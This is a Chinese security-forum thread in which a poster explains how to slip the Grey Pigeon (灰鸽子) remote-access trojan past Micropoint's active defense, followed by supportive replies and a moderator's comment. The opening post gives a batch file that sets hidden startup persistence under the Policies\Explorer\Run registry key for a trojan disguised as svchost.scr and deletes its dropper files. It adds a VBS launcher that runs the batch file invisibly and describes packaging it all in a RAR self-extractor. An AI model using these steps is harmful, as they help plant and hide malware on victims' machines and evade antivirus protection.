微点交流论坛 - 主动防御 - 灰鸽子再次穿越微点(第三) [此方法经过多人测试.无法穿越0153版本]）(版主请来封帖)

» 游客: 注册 | 登录 | 帮助

微点交流论坛 » 主动防御 » 灰鸽子再次穿越微点(第三) [此方法经过多人测试.无法穿越0153版本]）(版主请来封帖)

1/3

cici584522
注册用户

积分 109
发帖 49
注册 2007-11-12

#1 灰鸽子再次穿越微点(第三) [此方法经过多人测试.无法穿越0153版本]）(版主请来封帖)

录象捎后放出

大家好

我是小东￠酷儿（通用论坛ID cici584522)

欢迎大家访问我的BLOG  http://www.hackhobby.com

===================================================

“灰鸽子再次穿越微点(录象)”
此文章的方法已经被最新版本0153所封

但挑战主动防御并不会因此而终止。。

简单先介绍下上次的 “灰鸽子再次穿越微点(录象)”的思路，鸽子被做成自

解压缩后。。被释放到启动文件夹，但不立即运行，而是等重起或注销后自动

随系统启动。。而0153版本在此思路上更加入了智能化的判断。。就在重起后进

行拦截。。或许是微点记录着此木马为上次开机自解压缩到启动文件夹的。。也

可能是微点加大了对启动文件夹的敏感。。

下面就让我们来看下新的办法（临时防御办法开启微点防火墙）

既然启动文件夹已经可以说被盯死。。。那我们就换个办法吧。。。

用写注册表的方法（即使微点开启注册表保护。也不能拦截。因为
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\
Explorer\Run 这个地方是微点保护不到的。。。而这里就是组策略中可以设置
的开机启动项目

我们先做一个写注册表的批处理

@echo off
@reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run" /v lin /t REG_SZ /d %systemroot%\svchost.scr /f
@del /q /f /s %systemroot%\iexp.vbe
@del /q /f /s %systemroot%\iexp.bat

意思是把 WINDOWS目录下的 svchost.scr 列为开机启动项目，再将 iexp.vbe 与 iexp.bat 删除

因为批处理运行会弹出DOS窗后。。所以我们再准备个VBS脚本（VBE也可）

Set ws = CreateObject("Wscript.Shell")
ws.run "cmd /c iexp.bat",vbhide

意思是隐藏运行批处理 iexp.bat

把批处理和VBS与木马（命名为svchost.scr（SCR后缀本为屏幕保护程序)。不过
PE文件使用依然可以运行 / 灰鸽子的配置办法请看之前的文

章，这里就不说了,只是鸽子释放路径在此次录象中使用的是[$(WinDir)
\svchost.scr]）用RAR自解压缩。设置路径为%systemroot%（WIN目录下）。

然后设置解压缩后运行 iexp.vbe

不是PE可执行文件。。微点不会报的

现在运行自解压缩。。。把微点打开

微点主动防御软件  预升级
程序版本： 1.2.10571.0153
特征版本： 1.6.498.071111
更新时间： 2007-11-16 11:02:46

版本0153

没弹拦截。。重起后运行。。。不会拦截

教程结束。。希望微点早点解决。。

[ Last edited by cici584522 on 2007-12-28 at 01:39 ]

※ ※ ※ 本文纯属【cici584522】个人意见，与【微点交流论坛】立场无关※ ※ ※

2007-11-16 18:30

david1126103
版主

积分 723
发帖 721
注册 2006-9-17
来自美国

#2

希望继续努力，共同探索

※ ※ ※ 本文纯属【david1126103】个人意见，与【微点交流论坛】立场无关※ ※ ※

2007-11-16 18:35

青豆
高级用户

超级发动机

积分 523
发帖 489
注册 2006-9-28
来自汹涌澎湃浮沉混沌湍流

#3

支持高手探索

※ ※ ※ 本文纯属【青豆】个人意见，与【微点交流论坛】立场无关※ ※ ※

积极主动！

2007-11-16 22:28

hds_ss
银牌会员

积分 1105
发帖 1101
注册 2007-2-26

#4

微点应该针对几次穿越，找出问题所在，然后针对性的进行解决，不能头痛医头，脚痛医脚，这不解决问题。

※ ※ ※ 本文纯属【hds_ss】个人意见，与【微点交流论坛】立场无关※ ※ ※

系统为：XP Professional 版本为 2002 Sercice Pack 2
Intel946GZ+1G+PD820
预升级用户

2007-11-16 23:32

loveyuwei
新手上路

积分 26
发帖 26
注册 2007-11-15

#5

嗯，同意LS的看法。

※ ※ ※ 本文纯属【loveyuwei】个人意见，与【微点交流论坛】立场无关※ ※ ※

2007-11-17 00:23

yiyefuwei
注册用户

积分 195
发帖 188
注册 2007-4-20

Quote:

Originally posted by hds_ss at 2007-11-16 23:32:
微点应该针对几次穿越，找出问题所在，然后针对性的进行解决，不能头痛医头，脚痛医脚，这不解决问题。

建议是很好的~~但是一个软件,但的修复难度,要远远大于他开发难度
你打一个补丁,就会有可能造成更多麻烦~~~这就是软件~~

※ ※ ※ 本文纯属【yiyefuwei】个人意见，与【微点交流论坛】立场无关※ ※ ※

2007-11-17 00:54

Rokit
中级用户

积分 330
发帖 342
注册 2007-3-12
来自深圳

#7

那这回到底是漏了还是没有哦?

※ ※ ※ 本文纯属【Rokit】个人意见，与【微点交流论坛】立场无关※ ※ ※

2007-11-17 17:59

qq2008444
银牌会员

职业潜水艇

积分 5373
发帖 5291
注册 2007-7-7
来自兰·基亚斯兰古拉王国

Quote:

Originally posted by Rokit at 2007-11-17 17:59:
那这回到底是漏了还是没有哦?

应该是漏了
嗨...果然盾和矛之间的斗争是永远进行下去的

※ ※ ※ 本文纯属【qq2008444】个人意见，与【微点交流论坛】立场无关※ ※ ※

迅雷不及掩耳盗铃，以不变应万变不离其宗，成事不足挂齿，此物最相思风雨中，一屋不扫何以扫天下无敌，东边日出西边雨一直下，举头望明月几时有，呆若木鸡毛当令箭，杀鸡焉用牛刀小试，锋芒毕露春光，围魏救赵宝奎，Very good bye，八格牙鲁冰花，一泻千里共婵娟……

2007-11-17 20:24

tanlimo
新手上路

积分 30
发帖 30
注册 2007-2-24

#9

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run （这么重要的位置居然没有保护，真晕。）

※ ※ ※ 本文纯属【tanlimo】个人意见，与【微点交流论坛】立场无关※ ※ ※

2007-11-17 20:31

nasdaq
版主

版主

积分 1140
发帖 1118
注册 2006-4-6

#10

虽然这次没有能够成功突破微点主动防御，但是楼主的精神非常值得鼓励，同样用我的最大权限+10严重鼓励。

PS：欢迎大家来主动防御区讨论主动防御，以及进行各种技术测试。漫骂的不要，加分的管够。

※ ※ ※ 本文纯属【nasdaq】个人意见，与【微点交流论坛】立场无关※ ※ ※

2007-11-18 15:01

1/3

论坛跳转:

可打印版本 | 推荐 | 订阅 | 收藏

[ 联系我们 - 东方微点 ] 北京东方微点信息技术有限责任公司福建东方微点信息安全有限责任公司闽ICP备05030815号